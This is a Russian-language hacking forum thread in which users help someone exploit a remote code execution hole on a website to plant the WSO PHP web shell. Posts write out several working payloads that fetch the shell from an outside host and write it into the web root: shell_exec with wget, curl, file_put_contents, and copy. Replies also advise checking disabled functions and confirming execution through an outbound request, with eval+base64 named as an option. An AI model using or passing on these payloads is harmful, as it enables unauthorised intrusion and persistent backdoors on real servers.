Через нетспаркер нашёл дыру RCE через команду Code: <?php shell_exec('wget http://txt.731my.com/wso.txt -O jeks.php');?> дыра в регистрации site.ru/register/jeks.php site.ru/jeks.php shell так и не залился искал по адресам которые выше в чём проблема ?
curl -s -k http://txt.731my.com/wso.txt >> /var/www/название сайта/data/www/название сайта.com/wso.php & echo done тоже не катит
PHP: <?php file_put_contents($_SERVER['DOCUMENT_ROOT'].'/папка_с_права_на_запись/wso.php',file_get_contents('http://txt.731my.com/wso.txt ')); Пробовали? Есть вероятность, что системные команды выключены настройками безопасности? потому exec,passthru,shell_exec,system,proc_open,popen,curl_exec и тд работать не будут, проверьте phpinfo();
<?php phpinfo(); ?> то исполняется? Папка с правами для записи есть? как вариант <?php copy('http://txt.731my.com/wso.txt','shell.php'); ?>
ТС, ты хоть пхп для начала выучи, чтоли. Ты уже второй месяц чего-то там взламываешь. За это время можно-бы было выучить язык и больше никогда не создавать нубских топиков. По сабжу. Для начала надо убедиться что пхп-код вообще выполняется на сервере. Если это RCE то запусти такой код: PHP: $url = 'http://site.ru/file.txt';$banned = ini_get('disable_functions');if (function_exists('curl_init') && !is_int(strpos($banned, 'curl_'))) { $ch = curl_init($url); curl_exec($ch);} else { file_get_contents($url);} Ну или то-же самое под eval+base64. Затем идёшь в админку хостинга site.ru и смотришь в логе веб-сервера заходил-ли кто на /file.txt. Если в логе есть запись с этим uri - значит код на сервере запускается. Ели нет - либо функции заблокированы в disable_functions, либо вообще RCE не работает, что скорее всего.
